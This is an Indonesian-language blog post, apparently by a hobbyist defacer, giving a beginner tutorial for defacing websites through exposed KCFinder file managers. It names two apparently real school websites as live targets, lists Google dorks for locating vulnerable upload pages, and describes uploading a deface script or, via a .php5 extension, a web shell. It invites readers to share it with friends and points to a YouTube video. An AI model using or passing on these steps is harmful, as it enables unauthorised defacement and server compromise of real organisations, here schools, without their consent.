Oke sob kali ini gw bakalan ngasih tutorial deface poc kcfinder ini cocok banget untuk pemula kaya gw hehe...
Yu kita simak cok biar gak salah ...
- Rename dulu sc lu menjadi .id kalo mau up shell bisa menggunakan .php5 disini gw bakalan up sc doang
Live target :
https://sman08kendari.sch.id/assets/kcfinder/
https://sman1sebatiktengah.sch.id/assets/kcfinder/
Google Dork :
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload/
/panel/kcfinder/upload/files /
editor/kcfinder/upload
Kcfinder/upload/file
Exploit :
/browse.php
https://sman08kendari.sch.id/assets/kcfinder/
https://sman1sebatiktengah.sch.id/assets/kcfinder/
Google Dork :
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload/
/panel/kcfinder/upload/files /
editor/kcfinder/upload
Kcfinder/upload/file
Exploit :
/browse.php
- Search di google menggunakan dork diatas
- Cari web yang vuln. Tambahin /browse.php setelah /kcfinder cara mengecek vuln atau tidaknya
- Ciri-ciri vuln itu kaya gini lihat gambar dibawah
- Nah kalo gitu berarti vuln kalo gak kaya gitu tinggalin aja mungkin bukan jodoh lu :V
- Sekarang kita up sc klik tombol upload diatas
- Setelah itu up sc lu
- Kalo berhasil tar kayak gini
- Nah kalo berhasil tar muncul file lu
- Cara aksesnya gimana??
Mungkin cukup sekian, mohon maaf bila ada kesalahan. Jangan lupa share biar temen-temen lu pada bisa :'v
Kalo gak faham bisa nonton di channel youtube gw...
https://youtu.be/49wMW4kSK3Q




0 Comments